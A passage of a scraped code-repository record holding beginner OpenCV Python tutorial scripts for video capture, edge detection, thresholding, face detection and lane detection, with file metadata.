plt.yticks([])\r\n\r\nplt.show()\r\n\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()" }, { "alpha_fraction": 0.610859751701355, "alphanum_fraction": 0.6352941393852234, "avg_line_length": 27.91891860961914, "blob_id": "e3c989a449f15e62d335becceb503cd4a462337b", "content_id": "6f89c11255a27c3b8c798ec11da0a9e8c1104cd3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1105, "license_type": "no_license", "max_line_length": 137, "num_lines": 37, "path": "/Showing Date and Time in Videos.py", "repo_name": "feniltailor22/Computer_Vision", "src_encoding": "UTF-8", "text": "import cv2\r\nimport datetime\r\n\r\ncap=cv2.VideoCapture(0);\r\n#If we want to upload the video from computer:\r\n#cap=cv2.VideoCapture('Video Path');\r\n\r\n#Printing height and width of the video frame:\r\nprint(cap.get(cv2.CAP_PROP_FRAME_WIDTH))\r\nprint(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))\r\n\r\n#Creating While loop to capture the frame continuosly\r\n\r\nwhile (cap.isOpened()):\r\n ret, frame=cap.read()\r\n #Reading method gives True as an output if the cap(VideoCapture) is available and storing it as a frame.\r\n # ret= returning True or False \r\n \r\n if ret == True:\r\n \r\n datet= str(datetime.datetime.now())\r\n font=cv2.FONT_HERSHEY_COMPLEX\r\n line= cv2.LINE_AA\r\n frame= cv2.putText(img=frame, text=datet, org=(10,50), fontFace=font, fontScale=1, color=(0,255,255), thickness=2, lineType=line)\r\n \r\n cv2.imshow('frame',frame)\r\n \r\n if cv2.waitKey(1) & 0xFF == ord('q'):\r\n break\r\n\r\n else: \r\n break\r\n\r\ncap.release()\r\ncv2.destroyAllWindows()\r\n \r\n#If video frame is on and we press 'q' key then all video frame will be distroyed." }, { "alpha_fraction": 0.6258941292762756, "alphanum_fraction": 0.6573676466941833, "avg_line_length": 25.959999084472656, "blob_id": "0ccd9298357899306744641c723767d86b864212", "content_id": "bbe82226812ceab4da8ffa8d336d60f94f21cacd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1398, "license_type": "no_license", "max_line_length": 108, "num_lines": 50, "path": "/Video Capturing(Uploading) and Saving.py", "repo_name": "feniltailor22/Computer_Vision", "src_encoding": "UTF-8", "text": "import cv2\r\n\r\ncap=cv2.VideoCapture(0);\r\n#If we want to upload the video from computer:\r\n#cap=cv2.VideoCapture('Video Path');\r\n\r\n#Printing height and width of the video frame:\r\nprint(cap.get(cv2.CAP_PROP_FRAME_WIDTH))\r\nprint(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))\r\n\r\n#Setting up camera parameter(increasing hight and width of video)\r\ncap.set(3, 1208) #width(3)=1208\r\ncap.set(4, 720) #height(4)=720\r\n\r\n#Saving the captured video\r\n\r\nfourcc= cv2.VideoWriter_fourcc(*'XVID')\r\nout= cv2.VideoWriter(filename='output.avi', fourcc=fourcc, fps=20.0, frameSize=(640,480))\r\n\r\nprint(cap.isOpened())\r\n\r\n#Creating While loop to capture the frame continuosly\r\n\r\nwhile (cap.isOpened()):\r\n ret, frame=cap.read()\r\n \r\n #Reading method gives True as an output if the cap(VideoCapture) is available and storing it as a frame.\r\n # ret= returning True or False \r\n \r\n if ret == True:\r\n #If we want gray scale video capturing then use below command:\r\n #For color video capturing, we dont need it.\r\n #gray= cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\r\n #cv2.imshow('frame',gray)\r\n \r\n out.write(frame)\r\n\r\n cv2.imshow('frame',frame)\r\n \r\n if cv2.waitKey(1) & 0xFF == ord('q'):\r\n break\r\n\r\n else: \r\n break\r\n\r\nout.release()\r\ncap.release()\r\ncv2.destroyAllWindows()\r\n \r\n#If video frame is on and we press 'q' key then all video frame will be distroyed.\r\n" }, { "alpha_fraction": 0.5824742317199707, "alphanum_fraction": 0.6907216310501099, "avg_line_length": 19.66666603088379, "blob_id": "a008312ea5d6dbed3eb4104db894a763e853bf01", "content_id": "cf1cd4af146b7443bfef0d5b1c4c0aee3df447c1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 388, "license_type": "no_license", "max_line_length": 50, "num_lines": 18, "path": "/Merge Images.py", "repo_name": "feniltailor22/Computer_Vision", "src_encoding": "UTF-8", "text": "import numpy as np\r\nimport cv2\r\n\r\nimg1= cv2.imread('messi5.jpg',1)\r\nimg2= cv2.imread('opencv-logo.png',1)\r\n\r\n\r\nimg1= cv2.resize(img1,dsize=(512,512))\r\nimg2= cv2.resize(img2,dsize=(512,512))\r\n\r\nmerge_img= cv2.add(img1,img2);\r\nweighted_img=cv2.addWeighted(img1,0.9,img2,0.1,0);\r\n\r\ncv2.imshow('image',merge_img);\r\ncv2.imshow('image_',weighted_img);\r\n\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()" }, { "alpha_fraction": 0.5631999969482422, "alphanum_fraction": 0.7056000232696533, "avg_line_length": 25.2608699798584, "blob_id": "5408a6c0cbc01576b996489c61b02bc4c9b458f6", "content_id": "cae7d9f44daa1778aea46f420aed8c4cde5ddaaa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 625, "license_type": "no_license", "max_line_length": 60, "num_lines": 23, "path": "/Bitwise Operations on Image.py", "repo_name": "feniltailor22/Computer_Vision", "src_encoding": "UTF-8", "text": "import numpy as np\r\nimport cv2\r\nfrom numpy.core.fromnumeric import size\r\n\r\nimg1= np.zeros((250,500,3),np.uint8)\r\nimg1= cv2.rectangle(img1,(200,0),(300,100),(255,255,255),-1)\r\nimg2= np.zeros((250,500,3),np.uint8)\r\nimg2= cv2.rectangle(img2,(250,0),(500,500),(255,255,255),-1)\r\n\r\nbitAnd= cv2.bitwise_and(img1,img2)\r\nbitOr= cv2.bitwise_or(img1,img2)\r\nbitXOr= cv2.bitwise_xor(img1,img2)\r\nbitNot= cv2.bitwise_not(img1)\r\n\r\ncv2.imshow('image1',img1)\r\ncv2.imshow('image2',img2)\r\ncv2.imshow('bitAnd',bitAnd)\r\ncv2.imshow('bitOr',bitOr)\r\ncv2.imshow('bitXOr',bitXOr)\r\ncv2.imshow('bitNot',bitNot)\r\n\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()" }, { "alpha_fraction": 0.6793540716171265, "alphanum_fraction": 0.7035755515098572, "avg_line_length": 27.965517044067383, "blob_id": "438f9b5ddc40a254e329d34cc4e889905180ad11", "content_id": "44bc85e04b3cb5ae612b59652e165feebdc8ec28", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 867, "license_type": "no_license", "max_line_length": 112, "num_lines": 29, "path": "/Canny Edge Detection.py", "repo_name": "feniltailor22/Computer_Vision", "src_encoding": "UTF-8", "text": "#Canny Edge Detection Algorithm is composed of 5 Steps.\r\n#(i) Apply Gaussian Filter to smooth the Image in order to remove the Noise.\r\n#(ii) FInd the Intensity Gradient of the Image.\r\n#(iii) Apply Non-Maximum Supression to get rid of spurious response to Edge Detection.\r\n#(iv) Apply Double Threshold to determine potential Edges.\r\n#(v) Track Edges by Hysteresis i.e. finalize the detection of the Edges by supressing all the other weak Edges. \r\n\r\nimport numpy as np\r\nimport cv2\r\nimport matplotlib.pyplot as plt\r\n\r\nimg= cv2.imread('messi5.jpg',0)\r\n\r\ncanny= cv2.Canny(image=img, threshold1=100, threshold2=200)\r\n\r\ntitles= ['image', 'Canny']\r\nimages= [img, canny]\r\n\r\nfor i in range(2):\r\n plt.subplot(1,2,i+1) \r\n plt.imshow(images[i],'gray')\r\n plt.title(titles[i])\r\n plt.xticks([])\r\n plt.yticks([])\r\n\r\nplt.show()\r\n\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()" }, { "alpha_fraction": 0.6201550364494324, "alphanum_fraction": 0.6451334953308105, "avg_line_length": 34.34375, "blob_id": "9eb33e90362f7fe7207356ce71372630ee27b03f", "content_id": "63f5a073757391f45d622102cd4326a9d917d313", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1161, "license_type": "no_license", "max_line_length": 109, "num_lines": 32, "path": "/Face and Eye Detection using Haar Cascade Classifiers.py", "repo_name": "feniltailor22/Computer_Vision", "src_encoding": "UTF-8", "text": "import cv2\r\n\r\n#Define the classifier\r\nface_cascade= cv2.CascadeClassifier('haarcascade_frontalface_default.xml')\r\neye_cascade= cv2.CascadeClassifier('haarcascade_eye_tree_eyeglasses.xml')\r\n\r\ncap= cv2.VideoCapture(0)\r\n\r\nwhile cap.isOpened():\r\n _, img= cap.read()\r\n\r\n gray= cv2.cvtColor(img, cv2.COLOR_BGR2GRAY) #CascadeClassifier works only with gray scale images\r\n\r\n #Detect faces inside the image\r\n faces= face_cascade.detectMultiScale(image=gray, scaleFactor=1.1, minNeighbors=4)\r\n #scaleFactor= Parameter specifying how much the image size is reduced at wach image scale.\r\n #minNeighbors= Parameter specifying how many neighbors each candidate rectangle should have to retain it.\r\n\r\n for (x, y, w, h) in faces:\r\n cv2.rectangle(img, (x, y), (x+w, y+h), (255,0,0), 3)\r\n RoI_gray= gray[y:y+h, x:x+w]\r\n RoI_color= img[y:y+h, x:x+w] \r\n eyes= eye_cascade.detectMultiScale(RoI_gray)\r\n for (ex, ey, ew, eh) in eyes: \r\n cv2.rectangle(RoI_color, (ex, ey), (ex+ew, ey+eh), (0,255,0), 3)\r\n\r\n cv2.imshow('img',img)\r\n\r\n if cv2.waitKey(1) & 0xFF == ord('q'):\r\n break\r\n\r\ncap.release()" }, { "alpha_fraction": 0.5165496468544006, "alphanum_fraction": 0.5616850256919861, "avg_line_length": 27.382352828979492, "blob_id": "54de8ab2b0b25614df244988713cd4ed81c1e3ae", "content_id": "4bfb6a8f73a836b928829035d398b1a522e711b8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 997, "license_type": "no_license", "max_line_length": 73, "num_lines": 34, "path": "/Mouse Events 1.0.py", "repo_name": "feniltailor22/Computer_Vision", "src_encoding": "UTF-8", "text": "import cv2\r\n\r\n#Mouse events available in OpenCV:\r\n#events= [i for i in dir(cv2) if 'EVENT' in i]\r\n#print(events)\r\n\r\ndef click_event(event, x, y, flags, param):\r\n if event == cv2.EVENT_LBUTTONDOWN:\r\n print(x, ', ', y)\r\n font= cv2.FONT_HERSHEY_COMPLEX\r\n line= cv2.LINE_AA\r\n strXY= str(x) + ', ' + str(y) \r\n cv2.putText(img, strXY, (x, y), font, 0.5, (255,25,12), 1, line)\r\n cv2.imshow('image',img)\r\n \r\n if event == cv2.EVENT_RBUTTONDBLCLK:\r\n blue= img[y,x,0]\r\n green= img[y,x,1]\r\n red= img[y,x,2]\r\n font= cv2.FONT_HERSHEY_COMPLEX\r\n line= cv2.LINE_AA\r\n strBGR= str(blue)+ ', '+ str(green)+ ', '+ str(red)\r\n cv2.putText(img, strBGR, (x, y), font, 0.5, (0,255,220), 1, line)\r\n cv2.imshow('image',img)\r\n\r\nimg= cv2.imread('lena.jpg',1)\r\ncv2.imshow('image',img)\r\n\r\ncv2.setMouseCallback('image', click_event)\r\n\r\ncv2.waitKey(0)\r\ncv2.imwrite('lena_mouse_events_1.0.jpg',img)\r\n\r\ncv2.destroyAllWindows()" }, { "alpha_fraction": 0.629199743270874, "alphanum_fraction": 0.6756261587142944, "avg_line_length": 29.519229888916016, "blob_id": "0a2ec6f7a549409bf482cff81e1c97e0945ee1c5", "content_id": "745d9fde2195d96a052b506df15e32a86597f99c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1637, "license_type": "no_license", "max_line_length": 115, "num_lines": 52, "path": "/Road Lane Line Detection.py", "repo_name": "feniltailor22/Computer_Vision", "src_encoding": "UTF-8", "text": "import numpy as np\r\nimport cv2\r\nimport matplotlib.pyplot as plt\r\nfrom numpy.core.fromnumeric import shape\r\n\r\nimg= cv2.imread('road.jpg')\r\nimg= cv2.cvtColor(src=img, code=cv2.COLOR_BGR2RGB)\r\n\r\nprint(img.shape)\r\nheight= img.shape[0]\r\nwidth= img.shape[1]\r\n\r\n#Defining RoI\r\nregion_of_interest_vertices= [\r\n (200,height),\r\n (814, 400),\r\n (width,height)\r\n]\r\n\r\n#Creating a function to mask the region other than RoI\r\ndef region_of_interest(img, vertices):\r\n mask= np.zeros_like(img)\r\n #Fill inside the polygon\r\n cv2.fillPoly(img=mask, pts=vertices, color=255)\r\n #Return the image only where the mask pixel matches\r\n masked_image= cv2.bitwise_and(img, mask)\r\n return masked_image\r\n\r\ngray_img= cv2.cvtColor(src=img, code=cv2.COLOR_BGR2GRAY)\r\ncanny_image= cv2.Canny(image=gray_img, threshold1=100, threshold2=200)\r\n\r\ncropped_image= region_of_interest(canny_image, \r\n np.array(object=[region_of_interest_vertices], dtype=np.int32))\r\n\r\nlines= cv2.HoughLinesP(image=cropped_image, rho=6, theta=np.pi/180, threshold=160, minLineLength=40, maxLineGap=25)\r\n\r\ndef draw_the_lines(img, lines):\r\n img= np.copy(img)\r\n blank_img= np.zeros(shape=(img.shape[0], img.shape[1], 3), dtype=np.uint8)\r\n \r\n for line in lines:\r\n for x1, y1, x2, y2 in line:\r\n cv2.line(img=blank_img, pt1=(x1, y1), pt2=(x2, y2), color=(0,255,0), thickness=3)\r\n \r\n #Merge the image with the lines into the original image\r\n img= cv2.addWeighted(src1=img, alpha=0.8, src2=blank_img, beta=1, gamma=0.0)\r\n return img\r\n\r\nimage_with_lines= draw_the_lines(img, lines)\r\n\r\nplt.imshow(image_with_lines)\r\nplt.show()" }, { "alpha_fraction": 0.664545476436615, "alphanum_fraction": 0.7345454692840576, "avg_line_length": 36, "blob_id": "d47bfe16cb53da0c1d4843faa7b38c1727890628", "content_id": "4fb20807d7a6d7ad92000fe4b7df4dfd7ba603b4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1100, "license_type": "no_license", "max_line_length": 86, "num_lines": 29, "path": "/Simple Image Thresholding.py", "repo_name": "feniltailor22/Computer_Vision", "src_encoding": "UTF-8", "text": "import numpy as np\r\nimport cv2\r\n\r\nimg= cv2.imread('gradient.png')\r\n_, th1= cv2.threshold(src=img,thresh=127,maxval=255,type=cv2.THRESH_BINARY)\r\n#Pixel Values <thres will be 0.\r\n\r\n_, th2= cv2.threshold(src=img,thresh=127,maxval=255,type=cv2.THRESH_BINARY_INV)\r\n#Inverse of cv2.THRESH_BINARY inj which Pixel Values >thres will be 0.\r\n\r\n_, th3= cv2.threshold(src=img,thresh=127,maxval=255,type=cv2.THRESH_TRUNC)\r\n#In cv2.THRESH_TRUNC the o/p >thres value pixels will remailn the same as thres value.\r\n#i.e. if thres=127 then the pixel value >127 will be 127.\r\n\r\n_, th4= cv2.threshold(src=img,thresh=127,maxval=255,type=cv2.THRESH_TOZERO)\r\n#In cv2.THRESH_TOZERO the pixel values <thres will be zero after thresholding. \r\n\r\n_, th5= cv2.threshold(src=img,thresh=127,maxval=255,type=cv2.THRESH_TOZERO_INV)\r\n#cv2.THRESH_TOZERO_INV is inverse of cv2.THRESH_TOZERO.\r\n\r\ncv2.imshow('Input Image',img)\r\ncv2.imshow('Binary Thres',th1)\r\ncv2.imshow('Inv Binary Thres',th2)\r\ncv2.imshow('Trunc Thres',th3)\r\ncv2.imshow('Thres to Zero',th4)\r\ncv2.imshow('Thres to Zero Inv',th5)\r\n\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()" } ]
33
Skarpy735/ps-2fa-bypass-bruteforce
https://github.com/Skarpy735/ps-2fa-bypass-bruteforce
84181f34dc62f144f1085f1ab002f11eb4a329c9
5fb084ed97edb12fe0cbaacb9169d34d93d1efb3
33e59ad1d9446ce971afc2d194065ae0a1d1a0b4
refs/heads/main
2023-04-05T23:30:03.988430
2021-04-27T05:13:57
2021-04-27T05:13:57
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.608397364616394, "alphanum_fraction": 0.615532398223877, "avg_line_length": 34.378639221191406, "blob_id": "3b72a87481ff042c9616ac009a552a1b8f161058", "content_id": "311a1bc187317d811458c0ad8ddee1de10c95d1a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3644, "license_type": "no_license", "max_line_length": 101, "num_lines": 103, "path": "/solution.py", "repo_name": "Skarpy735/ps-2fa-bypass-bruteforce", "src_encoding": "UTF-8", "text": "import aiohttp\nimport asyncio\nfrom bs4 import BeautifulSoup\nimport time\n\nasync def main():\n # Set up some variables to access the login and 2fa login pages\n site = \"\"\n username = \"\"\n password = \"\"\n\n # A new client session for each attempt for this script\n # Each coroutine appended to the list will attempt at guessing the 2fa code\n\n attempts = []\n for i in range(0, 2001):\n session = aiohttp.ClientSession()\n mfacode = str(i).zfill(4)\n attempts.append(brute(site, session, username, password, mfacode))\n # Gather the functions and kick them off. Print the successful code and success page.\n await asyncio.gather(*attempts)\n\nasync def login_csrf(site, session):\n \"\"\" GET the login page csrf token before we POST\n Args:\n site (str): login to test\n session (aiohttp): web client session\n Returns:\n string: CSRF token \n \"\"\"\n async with session.get(f'https://{site}/login') as resp:\n soup = BeautifulSoup(await resp.text(),'html.parser')\n return soup.find('input', {'name':'csrf'}).get('value')\n\nasync def post_login(site, session, username, password, csrf):\n \"\"\" POST our login creds and return our CSRF token for the 2fa\n Args:\n site (str): login to test\n session (aiohttp): web client session\n username (str): username to log in\n password (str): password to log in\n csrf (str): CSRF token from previous GET\n Returns:\n string: CSRF token \n \"\"\"\n logindata = {\n 'csrf' : csrf,\n 'username' : username,\n 'password' : password\n }\n async with session.post(f'https://{site}/login', data=logindata) as resp:\n soup = BeautifulSoup(await resp.text(),'html.parser')\n return soup.find('input', {'name':'csrf'}).get('value')\n\nasync def post_2fa(site, session, csrf, mfacode):\n \"\"\" POST our login creds and return our CSRF token for the 2fa\n Args:\n site (str): login to test\n session (aiohttp): web client session\n csrf (str): CSRF token from previous GET\n mfacode (str): multi-factor code to submit\n Returns:\n int: response status code \n \"\"\"\n logindata = {\n 'csrf' : csrf,\n 'mfa-code' : mfacode\n }\n async with session.post(f'https://{site}/login2', data=logindata, allow_redirects=False) as resp:\n soup = BeautifulSoup(await resp.text(),'html.parser')\n return resp.status\n\nasync def brute(site, session, username, password, mfacode):\n \"\"\" One attempt at brute forcing 2fa. Prints our result.\n Args:\n site (str): login to test\n session (aiohttp): web client session\n username (str): username to log in\n password (str): password to log in\n mfacode (str): multi-factor code to submit\n \"\"\"\n csrf = await login_csrf(site, session)\n time.sleep(.001) \n csrf = await post_login(site, session, username, password, csrf)\n time.sleep(.001) \n status = await post_2fa(site, session, csrf, mfacode)\n if status == 302:\n print(f'2fa valid with response code {status}')\n print(f'Success! mfa-code is: {mfacode}')\n async with session.get(f'https://{site}/my-account?id=carlos') as resp:\n soup = BeautifulSoup(await resp.text(),'html.parser')\n print(soup)\n loop = asyncio.get_event_loop()\n # loop.shutdown_asyncgens()\n loop.stop()\n loop.close()\n else:\n print(f'2fa invalid with response code: {status}') \n await session.close()\n\nawait main() \n# loop = asyncio.get_event_loop()\n# loop.run_until_complete(main())\n" } ]
1
hubwub/reddit-plugin-liveupdate
https://github.com/hubwub/reddit-plugin-liveupdate
3aeaba5f1c5f72f8dcbdbc0d2fd93f5f9ba2a783
2142c7221a00252521374711abf2ce273bd0d212
62c755dcbb0aabe30f2fd2506259d2100bae067e
refs/heads/master
2017-04-28T17:25:08.500012
2014-07-23T23:24:22
2014-07-23T23:24:22
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5955235958099365, "alphanum_fraction": 0.5955235958099365, "avg_line_length": 22.60377311706543, "blob_id": "a1b4940d817674f195295d6949063cfc64ce32e5", "content_id": "246a8ca14cd3d2ac6276f5eb95c0e5adfbfc0bba", "detected_licenses": [ "LicenseRef-scancode-warranty-disclaimer", "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1251, "license_type": "permissive", "max_line_length": 83, "num_lines": 53, "path": "/reddit_liveupdate/public/static/js/liveupdate/event.js", "repo_name": "hubwub/reddit-plugin-liveupdate", "src_encoding": "UTF-8", "text": "!function(r, Backbone, $) {\n 'use strict'\n\n var exports = r.liveupdate.event = {}\n\n exports.LiveUpdateEvent = Backbone.Model.extend({\n defaults: {\n 'socket_state': 'connecting',\n },\n\n url: function() {\n return '/live/' + r.config.liveupdate_event + '/about.json'\n },\n\n parse: function(response) {\n return response.data\n },\n })\n\n exports.LiveUpdateEventView = Backbone.View.extend({\n initialize: function() {\n this.$titleEl = $('#liveupdate-title')\n this.$descriptionEl = $('#liveupdate-description')\n\n this.listenTo(this.model, {\n 'change:title': this.renderTitle,\n 'change:description_html': this.renderDescription,\n })\n },\n\n renderTitle: function() {\n this.$titleEl.text(this.model.get('title'))\n },\n\n renderDescription: function() {\n var description\n\n if (!this.$descriptionEl.length) {\n this.$descriptionEl = $('<section id=\"liveupdate-description\" class=\"md\">')\n }\n\n description = this.model.get('description_html')\n if (!description) {\n this.$descriptionEl.remove()\n return\n }\n\n this.$descriptionEl\n .html(description)\n .prependTo('aside.sidebar')\n },\n })\n}(r, Backbone, jQuery)\n" }, { "alpha_fraction": 0.5518433451652527, "alphanum_fraction": 0.5581797361373901, "avg_line_length": 20.432098388671875, "blob_id": "4236b8a1c6770c3faf56eb87ea1f2ea202054a14", "content_id": "055e6191445053c1c8f649b5a9d62203c4afbd77", "detected_licenses": [ "LicenseRef-scancode-warranty-disclaimer", "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1736, "license_type": "permissive", "max_line_length": 59, "num_lines": 81, "path": "/reddit_liveupdate/scraper.py", "repo_name": "hubwub/reddit-plugin-liveupdate", "src_encoding": "UTF-8", "text": "from pylons import g\n\nfrom r2.lib.hooks import HookRegistrar\nfrom r2.lib.media import Scraper, MediaEmbed\nfrom r2.lib.utils import UrlParser\n\n\nhooks = HookRegistrar()\n_EMBED_TEMPLATE = \"\"\"\n<!doctype html>\n<html>\n<head>\n<style>\niframe {{\n border: 1px solid black;\n}}\n</style>\n</head>\n<body>\n<iframe src=\"//{domain}/live/{event_id}/embed\"\n width=\"{width}\" height=\"{height}\">\n</iframe>\n</body>\n</html>\n\"\"\"\n\n\nclass _LiveUpdateScraper(Scraper):\n def __init__(self, event_id):\n self.event_id = event_id\n\n def _make_media_object(self):\n return {\n \"type\": \"liveupdate\",\n \"event_id\": self.event_id,\n }\n\n def scrape(self):\n return (\n None,\n self._make_media_object(),\n self._make_media_object(),\n )\n\n @classmethod\n def media_embed(cls, media_object):\n width = 710\n height = 500\n\n content = _EMBED_TEMPLATE.format(\n event_id=media_object[\"event_id\"],\n domain=g.media_domain,\n width=width,\n height=height,\n )\n\n return MediaEmbed(\n height=height,\n width=width,\n content=content,\n )\n\n\[email protected](\"scraper.factory\")\ndef make_scraper(url):\n parsed = UrlParser(url)\n\n if parsed.is_reddit_url():\n if parsed.path.startswith(\"/live/\"):\n try:\n event_id = parsed.path.split(\"/\")[2]\n except IndexError:\n return\n else:\n return _LiveUpdateScraper(event_id)\n\n\[email protected](\"scraper.media_embed\")\ndef make_media_embed(media_object):\n if media_object.get(\"type\") == \"liveupdate\":\n return _LiveUpdateScraper.media_embed(media_object)\n" }, { "alpha_fraction": 0.5622641444206238, "alphanum_fraction": 0.5622641444206238, "avg_line_length": 32.125, "blob_id": "45d2271e66357fcd997db8990d8e057a9c2ae4bb", "content_id": "c622895547d14592883fd26ac2cc2db2dc9f8dca", "detected_licenses": [ "LicenseRef-scancode-warranty-disclaimer", "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "HTML", "length_bytes": 265, "license_type": "permissive", "max_line_length": 87, "num_lines": 8, "path": "/reddit_liveupdate/public/static/js/liveupdate/update.html", "repo_name": "hubwub/reddit-plugin-liveupdate", "src_encoding": "UTF-8", "text": "<time class=\"live-timestamp\" datetime=\"<%- thing.isoDate %>\"></time>\n\n<div class=\"body\">\n <%= thing.body %>\n <% if (typeof(thing.authorName) !== 'null') { %>\n <a href=\"/user/<%- thing.authorName %>\" class=\"author\">/u/<%- thing.authorName %></a>\n <% } %>\n</div>\n" }, { "alpha_fraction": 0.5837724208831787, "alphanum_fraction": 0.5854583978652954, "avg_line_length": 29.811687469482422, "blob_id": "2a9b765d2352d356738308d865aa797e36a5bf62", "content_id": "86f96c1bc9c68c491be360129e5ca23d1d4a8e8b", "detected_licenses": [ "LicenseRef-scancode-warranty-disclaimer", "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4745, "license_type": "permissive", "max_line_length": 82, "num_lines": 154, "path": "/reddit_liveupdate/__init__.py", "repo_name": "hubwub/reddit-plugin-liveupdate", "src_encoding": "UTF-8", "text": "import sys\n\nfrom pylons.i18n import N_\n\nfrom r2.config.routing import not_in_sr\nfrom r2.lib.configparse import ConfigValue\nfrom r2.lib.js import (\n FileSource,\n LocalizedModule,\n LocaleSpecificSource,\n TemplateFileSource,\n PermissionsDataSource,\n)\nfrom r2.lib.plugin import Plugin\n\nfrom reddit_liveupdate.permissions import ContributorPermissionSet\n\n\nclass MomentTranslations(LocaleSpecificSource):\n def get_localized_source(self, lang):\n # TODO: minify this\n source = FileSource(\"lib/moment-langs/%s.js\" % lang)\n if not source.path:\n print >> sys.stderr, \" WARNING: no moment.js support for %r\" % lang\n return \"\"\n return source.get_source()\n\n\nclass LiveUpdate(Plugin):\n needs_static_build = True\n\n errors = {\n \"LIVEUPDATE_NO_INVITE_FOUND\":\n N_(\"there is no pending invite for that thread\"),\n \"LIVEUPDATE_TOO_MANY_INVITES\":\n N_(\"there are too many pending invites outstanding\"),\n \"LIVEUPDATE_ALREADY_CONTRIBUTOR\":\n N_(\"that user is already a contributor\"),\n }\n\n config = {\n ConfigValue.int: [\n \"liveupdate_invite_quota\",\n ],\n\n ConfigValue.str: [\n \"liveupdate_pixel_domain\",\n ],\n }\n\n js = {\n \"liveupdate\": LocalizedModule(\"liveupdate.js\",\n \"lib/page-visibility.js\",\n \"lib/tinycon.js\",\n \"lib/moment.js\",\n \"websocket.js\",\n\n \"liveupdate/init.js\",\n \"liveupdate/activity.js\",\n \"liveupdate/embeds.js\",\n \"liveupdate/event.js\",\n \"liveupdate/favicon.js\",\n \"liveupdate/listings.js\",\n \"liveupdate/notifications.js\",\n \"liveupdate/statusBar.js\",\n \"liveupdate/report.js\",\n\n TemplateFileSource(\"liveupdate/update.html\"),\n TemplateFileSource(\"liveupdate/separator.html\"),\n TemplateFileSource(\"liveupdate/edit-button.html\"),\n TemplateFileSource(\"liveupdate/reported.html\"),\n\n PermissionsDataSource({\n \"liveupdate_contributor\": ContributorPermissionSet,\n \"liveupdate_contributor_invite\": ContributorPermissionSet,\n }),\n\n localized_appendices=[\n MomentTranslations(),\n ],\n ),\n }\n\n def add_routes(self, mc):\n mc(\n \"/live\",\n controller=\"liveupdateevents\",\n action=\"home\",\n conditions={\"function\": not_in_sr},\n )\n\n mc(\n \"/live/create\",\n controller=\"liveupdateevents\",\n action=\"create\",\n conditions={\"function\": not_in_sr},\n )\n\n mc(\n \"/live/:filter\",\n action=\"listing\",\n controller=\"liveupdateevents\",\n conditions={\"function\": not_in_sr},\n requirements={\"filter\": \"open|closed|reported\"},\n )\n\n mc(\n \"/api/live/:action\",\n controller=\"liveupdateevents\",\n conditions={\"function\": not_in_sr},\n requirements={\"action\": \"create\"},\n )\n\n mc(\"/live/:event\", controller=\"liveupdate\", action=\"listing\",\n conditions={\"function\": not_in_sr}, is_embed=False)\n\n mc(\"/live/:event/embed\", controller=\"liveupdate\", action=\"listing\",\n conditions={\"function\": not_in_sr}, is_embed=True)\n\n mc(\"/live/:event/pixel\",\n controller=\"liveupdatepixel\", action=\"pixel\",\n conditions={\"function\": not_in_sr})\n\n mc(\"/live/:event/:action\", controller=\"liveupdate\",\n conditions={\"function\": not_in_sr})\n\n mc(\"/api/live/:event/:action\", controller=\"liveupdate\",\n conditions={\"function\": not_in_sr})\n\n mc('/mediaembed/liveupdate/:event/:liveupdate/:embed_index',\n controller=\"liveupdateembed\", action=\"mediaembed\")\n\n def load_controllers(self):\n from reddit_liveupdate.controllers import (\n LiveUpdateController,\n LiveUpdateEventsController,\n LiveUpdatePixelController,\n )\n\n from r2.config.templates import api\n from reddit_liveupdate import pages\n api('liveupdateeventapp', pages.LiveUpdateEventAppJsonTemplate)\n api('liveupdateevent', pages.LiveUpdateEventJsonTemplate)\n api('liveupdatereportedeventrow', pages.LiveUpdateEventJsonTemplate)\n api('liveupdate', pages.LiveUpdateJsonTemplate)\n\n from reddit_liveupdate import scraper\n scraper.hooks.register_all()\n\n def declare_queues(self, queues):\n from r2.config.queues import MessageQueue\n queues.declare({\n \"liveupdate_scraper_q\": MessageQueue(bind_to_self=True),\n })\n" } ]
4
saurabhvyas/hnatt
https://github.com/saurabhvyas/hnatt
5240d566da21da5b7f0fb6e72c4cc3d0e7738f8d
301d45f77639e939d7bc8f1ca945bc098e3e1467
2ca8487d0d690adbdd95faed5bee9401e314d9a4
refs/heads/master
2020-03-26T08:31:01.489807
2018-08-20T07:18:20
2018-08-20T07:18:20
144,706,905
0
0
MIT
2018-08-14T10:45:55
2018-08-14T10:43:35
2018-06-29T21:27:28
null
